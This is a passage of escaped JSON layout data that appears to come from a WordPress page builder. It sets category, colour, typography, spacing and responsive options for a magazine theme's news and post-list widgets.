:\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsi